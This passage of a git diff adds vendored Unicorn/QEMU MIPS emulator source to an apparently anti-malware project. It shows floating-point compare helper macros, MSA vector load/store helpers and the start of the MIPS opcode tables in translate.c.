SET_FP_COND(cc + 1, env->active_fpu); \ + else \ + CLEAR_FP_COND(cc + 1, env->active_fpu); \ +} \ +void helper_cmpabs_ps_ ## op(CPUMIPSState *env, uint64_t fdt0, \ + uint64_t fdt1, int cc) \ +{ \ + uint32_t fst0, fsth0, fst1, fsth1; \ + int ch, cl; \ + fst0 = float32_abs(fdt0 & 0XFFFFFFFF); \ + fsth0 = float32_abs(fdt0 >> 32); \ + fst1 = float32_abs(fdt1 & 0XFFFFFFFF); \ + fsth1 = float32_abs(fdt1 >> 32); \ + cl = condl; \ + ch = condh; \ + update_fcr31(env, GETPC()); \ + if (cl) \ + SET_FP_COND(cc, env->active_fpu); \ + else \ + CLEAR_FP_COND(cc, env->active_fpu); \ + if (ch) \ + SET_FP_COND(cc + 1, env->active_fpu); \ + else \ + CLEAR_FP_COND(cc + 1, env->active_fpu); \ +} + +/* NOTE: the comma operator will make "cond" to eval to false, + * but 
float32_unordered_quiet() is still called. */ +FOP_COND_PS(f, (float32_unordered_quiet(fst1, fst0, &env->active_fpu.fp_status), 0), + (float32_unordered_quiet(fsth1, fsth0, &env->active_fpu.fp_status), 0)) +FOP_COND_PS(un, float32_unordered_quiet(fst1, fst0, &env->active_fpu.fp_status), + float32_unordered_quiet(fsth1, fsth0, &env->active_fpu.fp_status)) +FOP_COND_PS(eq, float32_eq_quiet(fst0, fst1, &env->active_fpu.fp_status), + float32_eq_quiet(fsth0, fsth1, &env->active_fpu.fp_status)) +FOP_COND_PS(ueq, float32_unordered_quiet(fst1, fst0, &env->active_fpu.fp_status) || float32_eq_quiet(fst0, fst1, &env->active_fpu.fp_status), + float32_unordered_quiet(fsth1, fsth0, &env->active_fpu.fp_status) || float32_eq_quiet(fsth0, fsth1, &env->active_fpu.fp_status)) +FOP_COND_PS(olt, float32_lt_quiet(fst0, fst1, &env->active_fpu.fp_status), + float32_lt_quiet(fsth0, fsth1, &env->active_fpu.fp_status)) +FOP_COND_PS(ult, float32_unordered_quiet(fst1, fst0, &env->active_fpu.fp_status) || float32_lt_quiet(fst0, fst1, &env->active_fpu.fp_status), + float32_unordered_quiet(fsth1, fsth0, &env->active_fpu.fp_status) || float32_lt_quiet(fsth0, fsth1, &env->active_fpu.fp_status)) +FOP_COND_PS(ole, float32_le_quiet(fst0, fst1, &env->active_fpu.fp_status), + float32_le_quiet(fsth0, fsth1, &env->active_fpu.fp_status)) +FOP_COND_PS(ule, float32_unordered_quiet(fst1, fst0, &env->active_fpu.fp_status) || float32_le_quiet(fst0, fst1, &env->active_fpu.fp_status), + float32_unordered_quiet(fsth1, fsth0, &env->active_fpu.fp_status) || float32_le_quiet(fsth0, fsth1, &env->active_fpu.fp_status)) +/* NOTE: the comma operator will make "cond" to eval to false, + * but float32_unordered() is still called. 
*/ +FOP_COND_PS(sf, (float32_unordered(fst1, fst0, &env->active_fpu.fp_status), 0), + (float32_unordered(fsth1, fsth0, &env->active_fpu.fp_status), 0)) +FOP_COND_PS(ngle,float32_unordered(fst1, fst0, &env->active_fpu.fp_status), + float32_unordered(fsth1, fsth0, &env->active_fpu.fp_status)) +FOP_COND_PS(seq, float32_eq(fst0, fst1, &env->active_fpu.fp_status), + float32_eq(fsth0, fsth1, &env->active_fpu.fp_status)) +FOP_COND_PS(ngl, float32_unordered(fst1, fst0, &env->active_fpu.fp_status) || float32_eq(fst0, fst1, &env->active_fpu.fp_status), + float32_unordered(fsth1, fsth0, &env->active_fpu.fp_status) || float32_eq(fsth0, fsth1, &env->active_fpu.fp_status)) +FOP_COND_PS(lt, float32_lt(fst0, fst1, &env->active_fpu.fp_status), + float32_lt(fsth0, fsth1, &env->active_fpu.fp_status)) +FOP_COND_PS(nge, float32_unordered(fst1, fst0, &env->active_fpu.fp_status) || float32_lt(fst0, fst1, &env->active_fpu.fp_status), + float32_unordered(fsth1, fsth0, &env->active_fpu.fp_status) || float32_lt(fsth0, fsth1, &env->active_fpu.fp_status)) +FOP_COND_PS(le, float32_le(fst0, fst1, &env->active_fpu.fp_status), + float32_le(fsth0, fsth1, &env->active_fpu.fp_status)) +FOP_COND_PS(ngt, float32_unordered(fst1, fst0, &env->active_fpu.fp_status) || float32_le(fst0, fst1, &env->active_fpu.fp_status), + float32_unordered(fsth1, fsth0, &env->active_fpu.fp_status) || float32_le(fsth0, fsth1, &env->active_fpu.fp_status)) + +/* R6 compare operations */ +#define FOP_CONDN_D(op, cond) \ +uint64_t helper_r6_cmp_d_ ## op(CPUMIPSState * env, uint64_t fdt0, \ + uint64_t fdt1) \ +{ \ + uint64_t c; \ + c = cond; \ + update_fcr31(env, GETPC()); \ + if (c) { \ + return -1; \ + } else { \ + return 0; \ + } \ +} + +/* NOTE: the comma operator will make "cond" to eval to false, + * but float64_unordered_quiet() is still called. 
*/ +FOP_CONDN_D(af, (float64_unordered_quiet(fdt1, fdt0, &env->active_fpu.fp_status), 0)) +FOP_CONDN_D(un, (float64_unordered_quiet(fdt1, fdt0, &env->active_fpu.fp_status))) +FOP_CONDN_D(eq, (float64_eq_quiet(fdt0, fdt1, &env->active_fpu.fp_status))) +FOP_CONDN_D(ueq, (float64_unordered_quiet(fdt1, fdt0, &env->active_fpu.fp_status) + || float64_eq_quiet(fdt0, fdt1, &env->active_fpu.fp_status))) +FOP_CONDN_D(lt, (float64_lt_quiet(fdt0, fdt1, &env->active_fpu.fp_status))) +FOP_CONDN_D(ult, (float64_unordered_quiet(fdt1, fdt0, &env->active_fpu.fp_status) + || float64_lt_quiet(fdt0, fdt1, &env->active_fpu.fp_status))) +FOP_CONDN_D(le, (float64_le_quiet(fdt0, fdt1, &env->active_fpu.fp_status))) +FOP_CONDN_D(ule, (float64_unordered_quiet(fdt1, fdt0, &env->active_fpu.fp_status) + || float64_le_quiet(fdt0, fdt1, &env->active_fpu.fp_status))) +/* NOTE: the comma operator will make "cond" to eval to false, + * but float64_unordered() is still called. */ +FOP_CONDN_D(saf, (float64_unordered(fdt1, fdt0, &env->active_fpu.fp_status), 0)) +FOP_CONDN_D(sun, (float64_unordered(fdt1, fdt0, &env->active_fpu.fp_status))) +FOP_CONDN_D(seq, (float64_eq(fdt0, fdt1, &env->active_fpu.fp_status))) +FOP_CONDN_D(sueq, (float64_unordered(fdt1, fdt0, &env->active_fpu.fp_status) + || float64_eq(fdt0, fdt1, &env->active_fpu.fp_status))) +FOP_CONDN_D(slt, (float64_lt(fdt0, fdt1, &env->active_fpu.fp_status))) +FOP_CONDN_D(sult, (float64_unordered(fdt1, fdt0, &env->active_fpu.fp_status) + || float64_lt(fdt0, fdt1, &env->active_fpu.fp_status))) +FOP_CONDN_D(sle, (float64_le(fdt0, fdt1, &env->active_fpu.fp_status))) +FOP_CONDN_D(sule, (float64_unordered(fdt1, fdt0, &env->active_fpu.fp_status) + || float64_le(fdt0, fdt1, &env->active_fpu.fp_status))) +FOP_CONDN_D(or, (float64_le_quiet(fdt1, fdt0, &env->active_fpu.fp_status) + || float64_le_quiet(fdt0, fdt1, &env->active_fpu.fp_status))) +FOP_CONDN_D(une, (float64_unordered_quiet(fdt1, fdt0, &env->active_fpu.fp_status) + || float64_lt_quiet(fdt1, fdt0, 
&env->active_fpu.fp_status) + || float64_lt_quiet(fdt0, fdt1, &env->active_fpu.fp_status))) +FOP_CONDN_D(ne, (float64_lt_quiet(fdt1, fdt0, &env->active_fpu.fp_status) + || float64_lt_quiet(fdt0, fdt1, &env->active_fpu.fp_status))) +FOP_CONDN_D(sor, (float64_le(fdt1, fdt0, &env->active_fpu.fp_status) + || float64_le(fdt0, fdt1, &env->active_fpu.fp_status))) +FOP_CONDN_D(sune, (float64_unordered(fdt1, fdt0, &env->active_fpu.fp_status) + || float64_lt(fdt1, fdt0, &env->active_fpu.fp_status) + || float64_lt(fdt0, fdt1, &env->active_fpu.fp_status))) +FOP_CONDN_D(sne, (float64_lt(fdt1, fdt0, &env->active_fpu.fp_status) + || float64_lt(fdt0, fdt1, &env->active_fpu.fp_status))) + +#define FOP_CONDN_S(op, cond) \ +uint32_t helper_r6_cmp_s_ ## op(CPUMIPSState * env, uint32_t fst0, \ + uint32_t fst1) \ +{ \ + uint64_t c; \ + c = cond; \ + update_fcr31(env, GETPC()); \ + if (c) { \ + return -1; \ + } else { \ + return 0; \ + } \ +} + +/* NOTE: the comma operator will make "cond" to eval to false, + * but float32_unordered_quiet() is still called. 
*/ +FOP_CONDN_S(af, (float32_unordered_quiet(fst1, fst0, &env->active_fpu.fp_status), 0)) +FOP_CONDN_S(un, (float32_unordered_quiet(fst1, fst0, &env->active_fpu.fp_status))) +FOP_CONDN_S(eq, (float32_eq_quiet(fst0, fst1, &env->active_fpu.fp_status))) +FOP_CONDN_S(ueq, (float32_unordered_quiet(fst1, fst0, &env->active_fpu.fp_status) + || float32_eq_quiet(fst0, fst1, &env->active_fpu.fp_status))) +FOP_CONDN_S(lt, (float32_lt_quiet(fst0, fst1, &env->active_fpu.fp_status))) +FOP_CONDN_S(ult, (float32_unordered_quiet(fst1, fst0, &env->active_fpu.fp_status) + || float32_lt_quiet(fst0, fst1, &env->active_fpu.fp_status))) +FOP_CONDN_S(le, (float32_le_quiet(fst0, fst1, &env->active_fpu.fp_status))) +FOP_CONDN_S(ule, (float32_unordered_quiet(fst1, fst0, &env->active_fpu.fp_status) + || float32_le_quiet(fst0, fst1, &env->active_fpu.fp_status))) +/* NOTE: the comma operator will make "cond" to eval to false, + * but float32_unordered() is still called. */ +FOP_CONDN_S(saf, (float32_unordered(fst1, fst0, &env->active_fpu.fp_status), 0)) +FOP_CONDN_S(sun, (float32_unordered(fst1, fst0, &env->active_fpu.fp_status))) +FOP_CONDN_S(seq, (float32_eq(fst0, fst1, &env->active_fpu.fp_status))) +FOP_CONDN_S(sueq, (float32_unordered(fst1, fst0, &env->active_fpu.fp_status) + || float32_eq(fst0, fst1, &env->active_fpu.fp_status))) +FOP_CONDN_S(slt, (float32_lt(fst0, fst1, &env->active_fpu.fp_status))) +FOP_CONDN_S(sult, (float32_unordered(fst1, fst0, &env->active_fpu.fp_status) + || float32_lt(fst0, fst1, &env->active_fpu.fp_status))) +FOP_CONDN_S(sle, (float32_le(fst0, fst1, &env->active_fpu.fp_status))) +FOP_CONDN_S(sule, (float32_unordered(fst1, fst0, &env->active_fpu.fp_status) + || float32_le(fst0, fst1, &env->active_fpu.fp_status))) +FOP_CONDN_S(or, (float32_le_quiet(fst1, fst0, &env->active_fpu.fp_status) + || float32_le_quiet(fst0, fst1, &env->active_fpu.fp_status))) +FOP_CONDN_S(une, (float32_unordered_quiet(fst1, fst0, &env->active_fpu.fp_status) + || float32_lt_quiet(fst1, fst0, 
&env->active_fpu.fp_status) + || float32_lt_quiet(fst0, fst1, &env->active_fpu.fp_status))) +FOP_CONDN_S(ne, (float32_lt_quiet(fst1, fst0, &env->active_fpu.fp_status) + || float32_lt_quiet(fst0, fst1, &env->active_fpu.fp_status))) +FOP_CONDN_S(sor, (float32_le(fst1, fst0, &env->active_fpu.fp_status) + || float32_le(fst0, fst1, &env->active_fpu.fp_status))) +FOP_CONDN_S(sune, (float32_unordered(fst1, fst0, &env->active_fpu.fp_status) + || float32_lt(fst1, fst0, &env->active_fpu.fp_status) + || float32_lt(fst0, fst1, &env->active_fpu.fp_status))) +FOP_CONDN_S(sne, (float32_lt(fst1, fst0, &env->active_fpu.fp_status) + || float32_lt(fst0, fst1, &env->active_fpu.fp_status))) + +/* MSA */ +/* Data format min and max values */ +#define DF_BITS(df) (1 << ((df) + 3)) + +/* Element-by-element access macros */ +#define DF_ELEMENTS(df) (MSA_WRLEN / DF_BITS(df)) + +void helper_msa_ld_df(CPUMIPSState *env, uint32_t df, uint32_t wd, uint32_t rs, + int32_t s10) +{ + wr_t *pwd = &(env->active_fpu.fpr[wd].wr); + target_ulong addr = env->active_tc.gpr[rs] + (s10 << df); + int i; + + switch (df) { + case DF_BYTE: + for (i = 0; i < DF_ELEMENTS(DF_BYTE); i++) { + pwd->b[i] = do_lbu(env, addr + (i << DF_BYTE), + env->hflags & MIPS_HFLAG_KSU); + } + break; + case DF_HALF: + for (i = 0; i < DF_ELEMENTS(DF_HALF); i++) { + pwd->h[i] = do_lhu(env, addr + (i << DF_HALF), + env->hflags & MIPS_HFLAG_KSU); + } + break; + case DF_WORD: + for (i = 0; i < DF_ELEMENTS(DF_WORD); i++) { + pwd->w[i] = do_lw(env, addr + (i << DF_WORD), + env->hflags & MIPS_HFLAG_KSU); + } + break; + case DF_DOUBLE: + for (i = 0; i < DF_ELEMENTS(DF_DOUBLE); i++) { + pwd->d[i] = do_ld(env, addr + (i << DF_DOUBLE), + env->hflags & MIPS_HFLAG_KSU); + } + break; + } +} + +void helper_msa_st_df(CPUMIPSState *env, uint32_t df, uint32_t wd, uint32_t rs, + int32_t s10) +{ + wr_t *pwd = &(env->active_fpu.fpr[wd].wr); + target_ulong addr = env->active_tc.gpr[rs] + (s10 << df); + int i; + + switch (df) { + case DF_BYTE: + for (i = 
0; i < DF_ELEMENTS(DF_BYTE); i++) { + do_sb(env, addr + (i << DF_BYTE), pwd->b[i], + env->hflags & MIPS_HFLAG_KSU); + } + break; + case DF_HALF: + for (i = 0; i < DF_ELEMENTS(DF_HALF); i++) { + do_sh(env, addr + (i << DF_HALF), pwd->h[i], + env->hflags & MIPS_HFLAG_KSU); + } + break; + case DF_WORD: + for (i = 0; i < DF_ELEMENTS(DF_WORD); i++) { + do_sw(env, addr + (i << DF_WORD), pwd->w[i], + env->hflags & MIPS_HFLAG_KSU); + } + break; + case DF_DOUBLE: + for (i = 0; i < DF_ELEMENTS(DF_DOUBLE); i++) { + do_sd(env, addr + (i << DF_DOUBLE), pwd->d[i], + env->hflags & MIPS_HFLAG_KSU); + } + break; + } +} diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/target-mips/translate.c b/ai_anti_malware/unicorn/unicorn-master/qemu/target-mips/translate.c new file mode 100644 index 0000000..9a3ac9e --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/target-mips/translate.c @@ -0,0 +1,19748 @@ +/* + * MIPS32 emulation for qemu: main translation routines. + * + * Copyright (c) 2004-2005 Jocelyn Mayer + * Copyright (c) 2006 Marius Groeger (FPU operations) + * Copyright (c) 2006 Thiemo Seufer (MIPS32R2 support) + * Copyright (c) 2009 CodeSourcery (MIPS16 and microMIPS support) + * Copyright (c) 2012 Jia Liu & Dongxue Zhang (MIPS ASE DSP support) + * + * This library is free software; you can redistribute it and/or + * modify it under the terms of the GNU Lesser General Public + * License as published by the Free Software Foundation; either + * version 2 of the License, or (at your option) any later version. + * + * This library is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU + * Lesser General Public License for more details. + * + * You should have received a copy of the GNU Lesser General Public + * License along with this library; if not, see . 
+ */ + +#include "cpu.h" +#include "tcg-op.h" +#include "exec/cpu_ldst.h" + +#include "exec/helper-proto.h" +#include "exec/helper-gen.h" + +#include "exec/gen-icount.h" + +#define MIPS_DEBUG_DISAS 0 +//#define MIPS_DEBUG_SIGN_EXTENSIONS + +/* MIPS major opcodes */ +#define MASK_OP_MAJOR(op) (op & (((uint32_t)0x3F) << 26)) + +enum { + /* indirect opcode tables */ + OPC_SPECIAL = (0x00 << 26), + OPC_REGIMM = (0x01 << 26), + OPC_CP0 = (0x10 << 26), + OPC_CP1 = (0x11 << 26), + OPC_CP2 = (0x12 << 26), + OPC_CP3 = (0x13 << 26), + OPC_SPECIAL2 = (0x1C << 26), + OPC_SPECIAL3 = (0x1F << 26), + /* arithmetic with immediate */ + OPC_ADDI = (0x08 << 26), + OPC_ADDIU = (0x09 << 26), + OPC_SLTI = (0x0A << 26), + OPC_SLTIU = (0x0B << 26), + /* logic with immediate */ + OPC_ANDI = (0x0C << 26), + OPC_ORI = (0x0D << 26), + OPC_XORI = (0x0E << 26), + OPC_LUI = (0x0F << 26), + /* arithmetic with immediate */ + OPC_DADDI = (0x18 << 26), + OPC_DADDIU = (0x19 << 26), + /* Jump and branches */ + OPC_J = (0x02 << 26), + OPC_JAL = (0x03 << 26), + OPC_BEQ = (0x04 << 26), /* Unconditional if rs = rt = 0 (B) */ + OPC_BEQL = (0x14 << 26), + OPC_BNE = (0x05 << 26), + OPC_BNEL = (0x15 << 26), + OPC_BLEZ = (0x06 << 26), + OPC_BLEZL = (0x16 << 26), + OPC_BGTZ = (0x07 << 26), + OPC_BGTZL = (0x17 << 26), + OPC_JALX = (0x1D << 26), + OPC_DAUI = (0x1D << 26), + /* Load and stores */ + OPC_LDL = (0x1A << 26), + OPC_LDR = (0x1B << 26), + OPC_LB = (0x20 << 26), + OPC_LH = (0x21 << 26), + OPC_LWL = (0x22 << 26), + OPC_LW = (0x23 << 26), + OPC_LWPC = OPC_LW | 0x5, + OPC_LBU = (0x24 << 26), + OPC_LHU = (0x25 << 26), + OPC_LWR = (0x26 << 26), + OPC_LWU = (0x27 << 26), + OPC_SB = (0x28 << 26), + OPC_SH = (0x29 << 26), + OPC_SWL = (0x2A << 26), + OPC_SW = (0x2B << 26), + OPC_SDL = (0x2C << 26), + OPC_SDR = (0x2D << 26), + OPC_SWR = (0x2E << 26), + OPC_LL = (0x30 << 26), + OPC_LLD = (0x34 << 26), + OPC_LD = (0x37 << 26), + OPC_LDPC = OPC_LD | 0x5, + OPC_SC = (0x38 << 26), + OPC_SCD = (0x3C << 26), + OPC_SD = 
(0x3F << 26), + /* Floating point load/store */ + OPC_LWC1 = (0x31 << 26), + OPC_LWC2 = (0x32 << 26), + OPC_LDC1 = (0x35 << 26), + OPC_LDC2 = (0x36 << 26), + OPC_SWC1 = (0x39 << 26), + OPC_SWC2 = (0x3A << 26), + OPC_SDC1 = (0x3D << 26), + OPC_SDC2 = (0x3E << 26), + /* Compact Branches */ + OPC_BLEZALC = (0x06 << 26), + OPC_BGEZALC = (0x06 << 26), + OPC_BGEUC = (0x06 << 26), + OPC_BGTZALC = (0x07 << 26), + OPC_BLTZALC = (0x07 << 26), + OPC_BLTUC = (0x07 << 26), + OPC_BOVC = (0x08 << 26), + OPC_BEQZALC = (0x08 << 26), + OPC_BEQC = (0x08 << 26), + OPC_BLEZC = (0x16 << 26), + OPC_BGEZC = (0x16 << 26), + OPC_BGEC = (0x16 << 26), + OPC_BGTZC = (0x17 << 26), + OPC_BLTZC = (0x17 << 26), + OPC_BLTC = (0x17 << 26), + OPC_BNVC = (0x18 << 26), + OPC_BNEZALC = (0x18 << 26), + OPC_BNEC = (0x18 << 26), + OPC_BC = (0x32 << 26), + OPC_BEQZC = (0x36 << 26), + OPC_JIC = (0x36 << 26), + OPC_BALC = (0x3A << 26), + OPC_BNEZC = (0x3E << 26), + OPC_JIALC = (0x3E << 26), + /* MDMX ASE specific */ + OPC_MDMX = (0x1E << 26), + /* MSA ASE, same as MDMX */ + OPC_MSA = OPC_MDMX, + /* Cache and prefetch */ + OPC_CACHE = (0x2F << 26), + OPC_PREF = (0x33 << 26), + /* PC-relative address computation / loads */ + OPC_PCREL = (0x3B << 26), +}; + +/* PC-relative address computation / loads */ +#define MASK_OPC_PCREL_TOP2BITS(op) (MASK_OP_MAJOR(op) | (op & (3 << 19))) +#define MASK_OPC_PCREL_TOP5BITS(op) (MASK_OP_MAJOR(op) | (op & (0x1f << 16))) +enum { + /* Instructions determined by bits 19 and 20 */ + OPC_ADDIUPC = OPC_PCREL | (0 << 19), + R6_OPC_LWPC = OPC_PCREL | (1 << 19), + OPC_LWUPC = OPC_PCREL | (2 << 19), + + /* Instructions determined by bits 16 ... 
20 */ + OPC_AUIPC = OPC_PCREL | (0x1e << 16), + OPC_ALUIPC = OPC_PCREL | (0x1f << 16), + + /* Other */ + R6_OPC_LDPC = OPC_PCREL | (6 << 18), +}; + +/* MIPS special opcodes */ +#define MASK_SPECIAL(op) MASK_OP_MAJOR(op) | (op & 0x3F) + +enum { + /* Shifts */ + OPC_SLL = 0x00 | OPC_SPECIAL, + /* NOP is SLL r0, r0, 0 */ + /* SSNOP is SLL r0, r0, 1 */ + /* EHB is SLL r0, r0, 3 */ + OPC_SRL = 0x02 | OPC_SPECIAL, /* also ROTR */ + OPC_ROTR = OPC_SRL | (1 << 21), + OPC_SRA = 0x03 | OPC_SPECIAL, + OPC_SLLV = 0x04 | OPC_SPECIAL, + OPC_SRLV = 0x06 | OPC_SPECIAL, /* also ROTRV */ + OPC_ROTRV = OPC_SRLV | (1 << 6), + OPC_SRAV = 0x07 | OPC_SPECIAL, + OPC_DSLLV = 0x14 | OPC_SPECIAL, + OPC_DSRLV = 0x16 | OPC_SPECIAL, /* also DROTRV */ + OPC_DROTRV = OPC_DSRLV | (1 << 6), + OPC_DSRAV = 0x17 | OPC_SPECIAL, + OPC_DSLL = 0x38 | OPC_SPECIAL, + OPC_DSRL = 0x3A | OPC_SPECIAL, /* also DROTR */ + OPC_DROTR = OPC_DSRL | (1 << 21), + OPC_DSRA = 0x3B | OPC_SPECIAL, + OPC_DSLL32 = 0x3C | OPC_SPECIAL, + OPC_DSRL32 = 0x3E | OPC_SPECIAL, /* also DROTR32 */ + OPC_DROTR32 = OPC_DSRL32 | (1 << 21), + OPC_DSRA32 = 0x3F | OPC_SPECIAL, + /* Multiplication / division */ + OPC_MULT = 0x18 | OPC_SPECIAL, + OPC_MULTU = 0x19 | OPC_SPECIAL, + OPC_DIV = 0x1A | OPC_SPECIAL, + OPC_DIVU = 0x1B | OPC_SPECIAL, + OPC_DMULT = 0x1C | OPC_SPECIAL, + OPC_DMULTU = 0x1D | OPC_SPECIAL, + OPC_DDIV = 0x1E | OPC_SPECIAL, + OPC_DDIVU = 0x1F | OPC_SPECIAL, + + /* 2 registers arithmetic / logic */ + OPC_ADD = 0x20 | OPC_SPECIAL, + OPC_ADDU = 0x21 | OPC_SPECIAL, + OPC_SUB = 0x22 | OPC_SPECIAL, + OPC_SUBU = 0x23 | OPC_SPECIAL, + OPC_AND = 0x24 | OPC_SPECIAL, + OPC_OR = 0x25 | OPC_SPECIAL, + OPC_XOR = 0x26 | OPC_SPECIAL, + OPC_NOR = 0x27 | OPC_SPECIAL, + OPC_SLT = 0x2A | OPC_SPECIAL, + OPC_SLTU = 0x2B | OPC_SPECIAL, + OPC_DADD = 0x2C | OPC_SPECIAL, + OPC_DADDU = 0x2D | OPC_SPECIAL, + OPC_DSUB = 0x2E | OPC_SPECIAL, + OPC_DSUBU = 0x2F | OPC_SPECIAL, + /* Jumps */ + OPC_JR = 0x08 | OPC_SPECIAL, /* Also JR.HB */ + OPC_JALR = 0x09 | 
OPC_SPECIAL, /* Also JALR.HB */ + /* Traps */ + OPC_TGE = 0x30 | OPC_SPECIAL, + OPC_TGEU = 0x31 | OPC_SPECIAL, + OPC_TLT = 0x32 | OPC_SPECIAL, + OPC_TLTU = 0x33 | OPC_SPECIAL, + OPC_TEQ = 0x34 | OPC_SPECIAL, + OPC_TNE = 0x36 | OPC_SPECIAL, + /* HI / LO registers load & stores */ + OPC_MFHI = 0x10 | OPC_SPECIAL, + OPC_MTHI = 0x11 | OPC_SPECIAL, + OPC_MFLO = 0x12 | OPC_SPECIAL, + OPC_MTLO = 0x13 | OPC_SPECIAL, + /* Conditional moves */ + OPC_MOVZ = 0x0A | OPC_SPECIAL, + OPC_MOVN = 0x0B | OPC_SPECIAL, + + OPC_SELEQZ = 0x35 | OPC_SPECIAL, + OPC_SELNEZ = 0x37 | OPC_SPECIAL, + + OPC_MOVCI = 0x01 | OPC_SPECIAL, + + /* Special */ + OPC_PMON = 0x05 | OPC_SPECIAL, /* unofficial */ + OPC_SYSCALL = 0x0C | OPC_SPECIAL, + OPC_BREAK = 0x0D | OPC_SPECIAL, + OPC_SPIM = 0x0E | OPC_SPECIAL, /* unofficial */ + OPC_SYNC = 0x0F | OPC_SPECIAL, + + OPC_SPECIAL28_RESERVED = 0x28 | OPC_SPECIAL, + OPC_SPECIAL29_RESERVED = 0x29 | OPC_SPECIAL, + OPC_SPECIAL39_RESERVED = 0x39 | OPC_SPECIAL, + OPC_SPECIAL3D_RESERVED = 0x3D | OPC_SPECIAL, +}; + +/* R6 Multiply and Divide instructions have the same Opcode + and function field as legacy OPC_MULT[U]/OPC_DIV[U] */ +#define MASK_R6_MULDIV(op) (MASK_SPECIAL(op) | (op & (0x7ff))) + +enum { + R6_OPC_MUL = OPC_MULT | (2 << 6), + R6_OPC_MUH = OPC_MULT | (3 << 6), + R6_OPC_MULU = OPC_MULTU | (2 << 6), + R6_OPC_MUHU = OPC_MULTU | (3 << 6), + R6_OPC_DIV = OPC_DIV | (2 << 6), + R6_OPC_MOD = OPC_DIV | (3 << 6), + R6_OPC_DIVU = OPC_DIVU | (2 << 6), + R6_OPC_MODU = OPC_DIVU | (3 << 6), + + R6_OPC_DMUL = OPC_DMULT | (2 << 6), + R6_OPC_DMUH = OPC_DMULT | (3 << 6), + R6_OPC_DMULU = OPC_DMULTU | (2 << 6), + R6_OPC_DMUHU = OPC_DMULTU | (3 << 6), + R6_OPC_DDIV = OPC_DDIV | (2 << 6), + R6_OPC_DMOD = OPC_DDIV | (3 << 6), + R6_OPC_DDIVU = OPC_DDIVU | (2 << 6), + R6_OPC_DMODU = OPC_DDIVU | (3 << 6), + + R6_OPC_CLZ = 0x10 | OPC_SPECIAL, + R6_OPC_CLO = 0x11 | OPC_SPECIAL, + R6_OPC_DCLZ = 0x12 | OPC_SPECIAL, + R6_OPC_DCLO = 0x13 | OPC_SPECIAL, + R6_OPC_SDBBP = 0x0e | 
OPC_SPECIAL, + + OPC_LSA = 0x05 | OPC_SPECIAL, + OPC_DLSA = 0x15 | OPC_SPECIAL, +}; + +/* Multiplication variants of the vr54xx. */ +#define MASK_MUL_VR54XX(op) MASK_SPECIAL(op) | (op & (0x1F << 6)) + +enum { + OPC_VR54XX_MULS = (0x03 << 6) | OPC_MULT, + OPC_VR54XX_MULSU = (0x03 << 6) | OPC_MULTU, + OPC_VR54XX_MACC = (0x05 << 6) | OPC_MULT, + OPC_VR54XX_MACCU = (0x05 << 6) | OPC_MULTU, + OPC_VR54XX_MSAC = (0x07 << 6) | OPC_MULT, + OPC_VR54XX_MSACU = (0x07 << 6) | OPC_MULTU, + OPC_VR54XX_MULHI = (0x09 << 6) | OPC_MULT, + OPC_VR54XX_MULHIU = (0x09 << 6) | OPC_MULTU, + OPC_VR54XX_MULSHI = (0x0B << 6) | OPC_MULT, + OPC_VR54XX_MULSHIU = (0x0B << 6) | OPC_MULTU, + OPC_VR54XX_MACCHI = (0x0D << 6) | OPC_MULT, + OPC_VR54XX_MACCHIU = (0x0D << 6) | OPC_MULTU, + OPC_VR54XX_MSACHI = (0x0F << 6) | OPC_MULT, + OPC_VR54XX_MSACHIU = (0x0F << 6) | OPC_MULTU, +}; + +/* REGIMM (rt field) opcodes */ +#define MASK_REGIMM(op) MASK_OP_MAJOR(op) | (op & (0x1F << 16)) + +enum { + OPC_BLTZ = (0x00 << 16) | OPC_REGIMM, + OPC_BLTZL = (0x02 << 16) | OPC_REGIMM, + OPC_BGEZ = (0x01 << 16) | OPC_REGIMM, + OPC_BGEZL = (0x03 << 16) | OPC_REGIMM, + OPC_BLTZAL = (0x10 << 16) | OPC_REGIMM, + OPC_BLTZALL = (0x12 << 16) | OPC_REGIMM, + OPC_BGEZAL = (0x11 << 16) | OPC_REGIMM, + OPC_BGEZALL = (0x13 << 16) | OPC_REGIMM, + OPC_TGEI = (0x08 << 16) | OPC_REGIMM, + OPC_TGEIU = (0x09 << 16) | OPC_REGIMM, + OPC_TLTI = (0x0A << 16) | OPC_REGIMM, + OPC_TLTIU = (0x0B << 16) | OPC_REGIMM, + OPC_TEQI = (0x0C << 16) | OPC_REGIMM, + OPC_TNEI = (0x0E << 16) | OPC_REGIMM, + OPC_SYNCI = (0x1F << 16) | OPC_REGIMM, + + OPC_DAHI = (0x06 << 16) | OPC_REGIMM, + OPC_DATI = (0x1e << 16) | OPC_REGIMM, +}; + +/* Special2 opcodes */ +#define MASK_SPECIAL2(op) MASK_OP_MAJOR(op) | (op & 0x3F) + +enum { + /* Multiply & xxx operations */ + OPC_MADD = 0x00 | OPC_SPECIAL2, + OPC_MADDU = 0x01 | OPC_SPECIAL2, + OPC_MUL = 0x02 | OPC_SPECIAL2, + OPC_MSUB = 0x04 | OPC_SPECIAL2, + OPC_MSUBU = 0x05 | OPC_SPECIAL2, + /* Loongson 2F */ + 
OPC_MULT_G_2F = 0x10 | OPC_SPECIAL2, + OPC_DMULT_G_2F = 0x11 | OPC_SPECIAL2, + OPC_MULTU_G_2F = 0x12 | OPC_SPECIAL2, + OPC_DMULTU_G_2F = 0x13 | OPC_SPECIAL2, + OPC_DIV_G_2F = 0x14 | OPC_SPECIAL2, + OPC_DDIV_G_2F = 0x15 | OPC_SPECIAL2, + OPC_DIVU_G_2F = 0x16 | OPC_SPECIAL2, + OPC_DDIVU_G_2F = 0x17 | OPC_SPECIAL2, + OPC_MOD_G_2F = 0x1c | OPC_SPECIAL2, + OPC_DMOD_G_2F = 0x1d | OPC_SPECIAL2, + OPC_MODU_G_2F = 0x1e | OPC_SPECIAL2, + OPC_DMODU_G_2F = 0x1f | OPC_SPECIAL2, + /* Misc */ + OPC_CLZ = 0x20 | OPC_SPECIAL2, + OPC_CLO = 0x21 | OPC_SPECIAL2, + OPC_DCLZ = 0x24 | OPC_SPECIAL2, + OPC_DCLO = 0x25 | OPC_SPECIAL2, + /* Special */ + OPC_SDBBP = 0x3F | OPC_SPECIAL2, +}; + +/* Special3 opcodes */ +#define MASK_SPECIAL3(op) MASK_OP_MAJOR(op) | (op & 0x3F) + +enum { + OPC_EXT = 0x00 | OPC_SPECIAL3, + OPC_DEXTM 